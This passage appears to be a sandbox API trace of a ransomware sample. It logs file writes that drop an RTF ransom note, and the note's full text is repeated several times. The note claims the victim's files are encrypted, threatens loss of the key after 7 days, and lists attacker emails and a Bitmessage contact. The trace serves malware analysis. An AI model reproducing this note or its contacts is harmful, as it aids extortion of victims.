}}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.713] WriteFile (in: hFile=0x2cc, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.714] CloseHandle (hObject=0x2cc) returned 1 [0289.714] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bs-latn-ba\\#readme_eman#.rtf")) returned 0xffffffff [0289.714] GetLastError () returned 0x2 [0289.714] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\bs-latn-ba\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\bs-latn-ba\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0289.714] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.714] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.716] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 